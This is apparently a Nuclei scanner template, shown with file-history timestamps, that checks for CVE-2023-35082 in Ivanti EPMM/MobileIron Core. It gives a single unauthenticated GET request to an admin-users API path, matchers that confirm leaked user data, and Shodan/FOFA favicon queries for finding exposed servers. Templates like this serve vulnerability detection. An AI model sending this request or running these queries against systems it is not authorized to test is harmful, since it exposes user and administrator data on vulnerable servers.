2023-08-03 16:20:05 +00:00
id : CVE-2023-35082
info :
name : MobileIron Core - Remote Unauthenticated API Access
author : DhiyaneshDk
severity : critical
description : |
Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’ s security filter chain.
2023-09-27 15:51:13 +00:00
impact : |
Remote attackers can exploit this vulnerability to gain unauthorized access to sensitive data and perform malicious actions.
2023-09-06 11:43:37 +00:00
remediation : Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM)
2023-08-03 16:20:05 +00:00
reference :
- https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2023-35082
- https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US
2024-05-31 19:23:20 +00:00
- https://github.com/Chocapikk/CVE-2023-35082
- https://github.com/Ostorlab/KEV
2023-08-31 11:46:18 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-35082
cwe-id : CWE-287
2024-05-31 19:23:20 +00:00
epss-score : 0.96732
epss-percentile : 0.9966
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
2023-08-03 16:20:05 +00:00
metadata :
verified : true
2023-09-06 11:43:37 +00:00
max-request : 1
2023-08-31 11:46:18 +00:00
vendor : ivanti
product : endpoint_manager_mobile
2024-06-07 10:04:29 +00:00
shodan-query :
- http.favicon.hash:362091310
- http.favicon.hash:"362091310"
2023-09-06 11:43:37 +00:00
fofa-query : icon_hash="362091310"
2024-05-31 19:23:20 +00:00
tags : cve2023,cve,ivanti,mobileiron,epmm,kev
2023-08-03 16:20:05 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/mifs/asfV3/api/v2/admins/users"
max-size : 100
matchers :
- type : dsl
dsl :
- contains_all(body, 'results','userId','name')
- contains(header, 'application/json')
- status_code == 200
condition : and
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402206702aa2fa81c73af6527e7787118ebadcf29180430928e3bc14653af8e998871022016579004bf1530a83e0640a0dcab8e5c6abc73598758d064bf917bfc3996d707:922c64590222798bb761d5b6d8e72950